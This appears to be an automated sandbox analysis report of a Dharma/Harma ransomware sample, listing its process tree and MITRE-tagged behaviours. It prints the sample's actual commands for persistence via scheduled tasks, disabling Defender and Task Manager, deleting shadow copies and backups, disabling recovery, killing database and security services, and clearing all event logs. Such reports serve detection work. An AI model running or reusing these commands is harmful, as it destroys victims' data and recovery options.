PID 2068 wrote to memory of 2544	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2544 wrote to memory of 1956	2544	cmd.exe	attrib.exe
PID 2544 wrote to memory of 1956	2544	cmd.exe	attrib.exe
PID 2544 wrote to memory of 1956	2544	cmd.exe	attrib.exe
PID 2068 wrote to memory of 2196	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 2196	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 2196	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2196 wrote to memory of 4336	2196	cmd.exe	schtasks.exe
PID 2196 wrote to memory of 4336	2196	cmd.exe	schtasks.exe
PID 2196 wrote to memory of 4336	2196	cmd.exe	schtasks.exe
PID 2068 wrote to memory of 1608	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 1608	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 1608	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 1608 wrote to memory of 4564	1608	cmd.exe	schtasks.exe
PID 1608 wrote to memory of 4564	1608	cmd.exe	schtasks.exe
PID 1608 wrote to memory of 4564	1608	cmd.exe	schtasks.exe
PID 2068 wrote to memory of 2748	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 2748	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 2748	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2748 wrote to memory of 3244	2748	cmd.exe	attrib.exe
PID 2748 wrote to memory of 3244	2748	cmd.exe	attrib.exe
PID 2748 wrote to memory of 3244	2748	cmd.exe	attrib.exe
PID 2068 wrote to memory of 1508	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 1508	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 1508	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 1508 wrote to memory of 3592	1508	cmd.exe	attrib.exe
PID 1508 wrote to memory of 3592	1508	cmd.exe	attrib.exe
PID 1508 wrote to memory of 3592	1508	cmd.exe	attrib.exe
PID 2068 wrote to memory of 4720	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 4720	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 4720	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 4720 wrote to memory of 4716	4720	cmd.exe	cmd.exe
PID 4720 wrote to memory of 4716	4720	cmd.exe	cmd.exe
PID 4720 wrote to memory of 4716	4720	cmd.exe	cmd.exe
PID 2068 wrote to memory of 3568	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 3568	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 3568	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 3568 wrote to memory of 548	3568	cmd.exe	cmd.exe
PID 3568 wrote to memory of 548	3568	cmd.exe	cmd.exe
PID 3568 wrote to memory of 548	3568	cmd.exe	cmd.exe
PID 2068 wrote to memory of 4104	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 4104	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 2068 wrote to memory of 4104	2068	30e1234ef3e570667526fdb006832b12.exe	cmd.exe
PID 3568 wrote to memory of 3028	3568	cmd.exe	taskkill.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1956 attrib.exe
3592 attrib.exe
3244 attrib.exe
4432 attrib.exe
3184 attrib.exe

pid	process
1956	attrib.exe
3592	attrib.exe
3244	attrib.exe
4432	attrib.exe
3184	attrib.exe

C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe
"C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:3352

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:3296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
2⤵
- Drops startup file
PID:4548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
2⤵
PID:740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2712

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
3⤵
- Creates scheduled task(s)
PID:4268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\30e1234ef3e570667526fdb006832b12.exe" /F
3⤵
- Creates scheduled task(s)
PID:4564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:4720

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
PID:4716

C:\Windows\SysWOW64\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:1596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV
2⤵
PID:3364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma
2⤵
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"
2⤵
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV
2⤵
PID:2720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:924

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:3012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:4928

C:\Windows\SysWOW64\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:3220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:2828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB
2⤵
PID:2840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
PID:4104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:3568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt" && exit
2⤵
PID:4716

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt"
3⤵
PID:5072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:4992

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:4440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:4088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:1252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:4192

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:2840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:4600

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:2796

C:\Windows\SysWOW64\net.exe
net stop avpsus /y
3⤵
PID:396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
4⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:2628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:3356

C:\Windows\SysWOW64\net.exe
net stop BMR Boot Service /y
3⤵
PID:4516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:4128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:5104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:2556

C:\Windows\SysWOW64\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:4544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:5004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:2648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:1444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win d:*.dsk
2⤵
PID:3924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s HRMPUB
2⤵
PID:4644

C:\Windows\SysWOW64\attrib.exe
attrib +h +s HRMPUB
3⤵
- Views/modifies file attributes
PID:4432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:1604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:4628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:4428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
2⤵
PID:4916

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
3⤵
PID:4080

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
3⤵
PID:3364

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
3⤵
PID:3332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
3⤵
PID:3108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"
3⤵
PID:1792

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"
3⤵
PID:3660

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"
3⤵
PID:5032

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"
3⤵
PID:792

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
3⤵
PID:1484

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
3⤵
PID:4128

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
3⤵
PID:4192

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
3⤵
PID:4064

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
3⤵
PID:924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
3⤵
PID:3176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
3⤵
PID:4092

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-XDV/Analytic"
3⤵
- Clears Windows event logs
PID:4892

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Admin"
3⤵
PID:400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Operational"
3⤵
PID:3972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-KeyboardFilter/Performance"
3⤵
PID:3280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
3⤵
PID:4556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
3⤵
PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
3⤵
PID:888

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LSA/Diagnostic"
3⤵
PID:4804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LSA/Operational"
3⤵
PID:4060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LSA/Performance"
3⤵
PID:2904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
3⤵
PID:4928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
3⤵
PID:1332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
3⤵
PID:2796

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
3⤵
PID:768

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"
3⤵
PID:1928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
3⤵
PID:3376

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
3⤵
- Clears Windows event logs
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"
3⤵
PID:2092

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"
3⤵
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
3⤵
PID:3440

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
4⤵
- Creates scheduled task(s)
PID:4220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
3⤵
PID:4220

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
3⤵
PID:4472

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
3⤵
PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"
3⤵
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
3⤵
PID:3456

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
3⤵
PID:1936

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
3⤵
PID:512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
3⤵
PID:3120

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
3⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
3⤵
PID:1824

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
3⤵
PID:4856

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"
3⤵
PID:3216

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"
3⤵
PID:1684

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"
3⤵
- Clears Windows event logs
PID:3904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
3⤵
PID:1872

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
3⤵
PID:2256

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"
3⤵
- Clears Windows event logs
PID:4052

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
3⤵
PID:4516

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"
3⤵
PID:2680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
3⤵
PID:1452

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
3⤵
PID:1728

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"
3⤵
PID:372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
3⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"
3⤵
PID:2280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
3⤵
PID:4420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
3⤵
PID:3328

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
3⤵
PID:3996

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
3⤵
PID:212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
3⤵
PID:5072

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ncasvc/Operational"
3⤵
PID:2804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Diagnostic"
3⤵
PID:3368

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Operational"
3⤵
- Clears Windows event logs
PID:4396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NdisImPlatform/Operational"
3⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ndu/Diagnostic"
3⤵
PID:972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-Setup/Diagnostic"
3⤵
PID:2828

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkBridge/Diagnostic"
3⤵
PID:1564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Analytic"
3⤵
PID:1820

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Operational"
3⤵
PID:1308

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
3⤵
- Clears Windows event logs
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
3⤵
PID:2736

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Operational"
3⤵
PID:3336

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
3⤵
PID:1232

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
3⤵
PID:4564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneBackup/Debug"
3⤵
PID:4880

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OtpCredentialProvider/Operational"
3⤵
PID:404

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Partition/Analytic"
3⤵
PID:4720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PerceptionRuntime/Operational"
3⤵
PID:3348

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"
3⤵
PID:1088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"
3⤵
PID:3660

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"
3⤵
PID:2012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"
3⤵
PID:436

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PlayToManager/Analytic"
3⤵
PID:3176

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
3⤵
PID:4440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
3⤵
PID:2464

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
3⤵
PID:4060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
3⤵
PID:3012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
3⤵
PID:396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
3⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
3⤵
PID:844

C:\Windows\SysWOW64\wevtutil.exe
